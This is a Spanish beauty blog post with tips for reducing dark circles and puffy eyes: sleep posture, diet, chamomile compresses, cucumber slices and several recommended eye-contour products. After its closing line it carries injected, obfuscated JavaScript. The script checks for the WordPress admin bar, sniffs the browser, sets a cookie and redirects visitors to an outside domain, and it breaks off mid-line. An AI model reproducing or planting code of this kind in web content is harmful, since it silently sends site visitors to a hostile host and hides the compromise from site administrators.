Por cansancio, estrés, retención de líquidos, genética, un mal día… Las ojeras y las bolsas bajo los ojos son el complemento que, salvando Halloween, nadie desea en su rostro. Se trata de una preocupación estética muy común, por lo que hoy contaremos algunos trucos para hacerlas desaparecer; y así poder lucir una mirada llena de brillo. 

 

El contorno de los ojos, además de ser la primera zona en mostrar los síntomas del cansancio, es una zona que presenta una piel muy fina y sensible, lo que hace que tenga una alta predisposición a las ojeras, bolsas y arrugas. Para evitarlas, lo primero que debemos hacer es tener precaución para que no aparezcan. ¿Cómo? Durmiendo las horas necesarias, bebiendo agua de forma habitual, evitando el consumo de demasiada sal, aplicando cremas específicas a partir de los 25, protegiéndonos del sol y del excesivo uso de pantallas digitales… A pesar de todas las precauciones que podemos tomar, hay días en los que su aparición es inevitable y amanecemos con los ojos hinchados y unas ojeras de libro. Para que, ni por esas, las bolsas y ojeras apaguen nuestra mirada, vamos a ver algunos cuidados y métodos para hacerlas desaparecer. ¡Comenzamos!

 

Young happy woman in towel applying organic face scrub and looking at round mirror in stylish bathroom. Girl making facial massage, peeling and cleaning skin on face. Skin Care and Hygiene

 

TODO EMPIEZA EN TU CAMA

 

Dependiendo del tipo de piel, las recomendaciones o métodos a seguir varían. Como no es lo mismo tratar una piel sensible, que una seca, que una grasa, antes de contaros específicamente acerca de cada una de ellas, vamos a contaros un par de truquillos que vienen bien sea cual sea tu tipo de piel.

 

El primero de ellos, como comentamos anteriormente, es descansar las horas necesarias. El contorno de los ojos, al ser una zona muy sensible, es la primera en mostrar signos de cansancio, por lo que dormir lo necesario es fundamental. Estar descansado significa no lucir cansado, es algo obvio pero nunca está de más recordarlo.

 

Para que estas horas de descanso sean más efectivas, es importante dormir boca arriba y con la cabeza ligeramente más elevada que el resto del cuerpo. Para ello, puedes colocar un cojín debajo de tu almohada o directamente cambiar de almohada; lo importante es que nuestra cabeza quede por encima del cuerpo, favoreciendo así la circulación responsable de las bolsas que aparecen bajo los párpados.

 

CUIDADO NATURAL 

 

Para aquellas que quieren cuidar de su piel y prevenir sus ojeras de la formas más natural posible, las recomendaciones están muy orientadas a la alimentación y la hidratación. En muchos casos estas remarcadas muestras de cansancio se deben a la falta de hierro, y por consecuencia, la ingesta de carnes rojas, verduras de hoja, yemas de huevo y cítricos nos ayudarán con ellas. Así que ya sabes, ¡vigila lo que comes!

 

Cuando las bolsas aparecen solo cuando nos levantamos, seguramente el motivo sea la retención de líquidos, para lo que disminuir el consumo de sal ayudará a reducirlas. Otra manera de acabar con las ojeras es a través de infusiones drenantes, donde recomendamos la infusión de manzanilla, que es antiinflamatoria y calmante. Para su aplicación solo debes preparar la infusión, y cuando esté fría impregnarla en dos discos de algodón que debemos colocar sobre nuestros ojos durante 15 minutos.

 

En el caso de que necesites un efecto más rápido y directo, te recomendamos Masque Contour des Yeux, una mascarilla de activos vegetales y vitaminas que disimula el cansancio, atenuando las marcas de alrededor de los ojos. Su aplicación es muy sencilla y solo necesita de 10 minutos para hacer efecto, por lo que si las prisas no juegan en nuestro favor, es una opción perfecta. Además al ser mascarilla, podemos emplearla tantas veces como queramos o nuestra piel necesite.

 

Smiling happy pretty young teen girl woman applying moisturizing lotion cosmetic cream on face for clean healthy soft skin care natural beauty treatment isolated on white grey studio blank background
Smiling happy pretty young teen girl woman applying moisturizing lotion cosmetic cream on face for clean healthy soft skin care natural beauty treatment isolated on white grey studio blank background

 

CUIDADO LIGERO Y REFRESCANTE

 

Hay pocas cosas que apaguen tanto un rostro como la sensación de cansancio. A pesar de que siempre nos guste lucir bien, hay veces que, tras una noche de marcha, un mal día o un descanso incómodo, es imposible. Cuando se dan estas circunstancias, uno de los momentos más placentero del día es lavarse la cara y refrescarse. Si a ello le sumamos la aplicación de alguna crema hidratante fresquita, nuestra vitalidad parece otra ¿Verdad o no? Por eso, os recomendamos que guardéis vuestros productos específicos para el contorno de los ojos en la nevera, ya que además de servir como despertador, su efecto será más efectivo y nos ayudará a descongestionar la zona.

 

Como decimos, aplicar mascarillas hidratantes, revitalizadoras y calmantes sirve para recuperar la luminosidad en la mirada. Cada una tiene su producto estrella para revivir su mirada, pero nosotras por experiencia propia os podemos recomendar Clarins Hydra-Essentiel, una mascarilla con textura de crema-gel que alisa las líneas de expresión, combate la sequedad y te deja la piel suave y fresca. Y es que una mirada ligera, fresca y descansada se nota, ¡y tanto que se nota! 

 

Otro de los métodos, uno de los más conocidos y clásicos de todos, es el pepino. Estamos hartas de ver en las películas este remedio, pero la realidad es que su alto contenido en agua y vitamina E le aportan unas cualidades hidratantes y anti-inflamatorias únicas. Su efecto es capaz de calmar la piel y reducir la inflamación. Para aplicarlo, como anteriormente indicamos con los diferentes productos, debe estar frío.

 

Young relaxing woman in white bathrobes lying on bed with refreshing cucumber slices on eyes
Young relaxing woman in white bathrobes lying on bed with refreshing cucumber slices on eyes

 

CUIDADO PARA LAS PIELES MÁS SENSIBLES

 

Cuando tenemos la piel más sensible de lo normal, necesitamos unos cuidados especiales. Su fragilidad nos lleva a aplicar una serie de métodos que calmen la piel irritada y nos ayuden a fortalecer la barrera de humedad protectora de la piel. 

 

Para ello la hidratación es fundamental, ya que hidratar la piel con regularidad mejorará el aspecto y salud de tu piel. Debemos darnos duchas cortas y con agua fresca, que ayuden a mejorar la circulación. Por otro lado, debemos protegernos del sol todos los días del año, puesto que la exposición a él es el primer motivo de una piel sensible, y en el contorno de los ojos su efecto puede acentuarse.

 

Para actuar directamente contra las bolsas y ojeras, debemos encontrar un producto que se adapta a ese cuidado especial que precisamos, sin fuertes contenidos químicos. El Contorno de Ojos Revitalizante Pep Start es una muy buena opción si nuestra piel se caracteriza por ser sensible, ya que es libre de perfume y está testado oftalmológicamente y sometido a pruebas de alergia. En tan solo 3 segundos es capaz de refrescar, hidratar y aportar luminosidad a tu mirada.

 

Para aplicar cualquier producto que utilices, sé cuidadosa y masajea con cuidado la zona. Evita utilizar algodones ya que, aparte de irritar la piel, quitan la hidratación natural de la misma; es mucho mejor aplicarlo con las yemas de los dedos.

 

Como hemos dicho, cada piel es diferente, por lo que es importante que conozcas qué es lo que mejor le sienta a la tuya y qué no. Adaptar nuestros consejos a tu propio cuerpo y encontrar tus pequeños trucos. De esta forma conseguirás un cuidado idóneo y podrás decir adiós a las bolsas y ojeras definitivamente. ¡Hasta la próxima! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone